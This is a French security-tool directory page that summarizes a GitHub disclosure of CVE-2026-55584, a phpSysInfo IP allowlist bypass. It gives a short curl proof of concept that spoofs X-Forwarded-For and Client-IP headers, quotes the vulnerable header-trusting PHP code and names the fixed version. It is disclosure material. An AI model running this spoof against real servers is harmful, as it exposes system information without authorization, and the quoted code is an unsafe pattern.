Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-55584 — CVE-2026-55584 — Contournement de la liste d'autorisation IP de phpSysInfo | Kitploit
Outils/GitHubGitHub/mirackayikci/cve-2026-55584
Authentification et AutorisationAnalyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionMauvaise Configuration
GitHubmirackayikci/cve-2026-55584

CVE-2026-55584

CVE-2026-55584 — Contournement de la liste d'autorisation IP de phpSysInfo

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-55584 - Contournement de la liste blanche d'adresses IP de phpSysInfo

CWE-290, CVSS 7.5 (Élevé), phpSysInfo <= 3.4.5

Références : GHSA-786w-p5pm-cvgh, CVE.org

PSI_ALLOWED résout l'adresse IP du client à partir des en-têtes contrôlés par l'attaquant X-Forwarded-For (puis Client-IP) avant de revenir à REMOTE_ADDR. Il n'existe aucun concept de proxy de confiance, de sorte que l'usurpation d'une adresse IP autorisée neutralise la liste blanche et expose toutes les informations système via xml.php.

PoC :

root@kitploit:~
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php                                # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php  # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8"       http://target/xml.php  # bypass, full XML

Code vulnérable (read_config.php) :

root@kitploit:~
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
    $ip = $_SERVER["REMOTE_ADDR"];   // only trustworthy source, checked last
}

Corrigé en 3.4.6 (019fa2d) : utilise REMOTE_ADDR par défaut ; ne respecte X-Forwarded-For / Client-IP que depuis des proxys de confiance configurés.

Signalé par Muhammed Mirac Kayıkci

Télécharger l’outil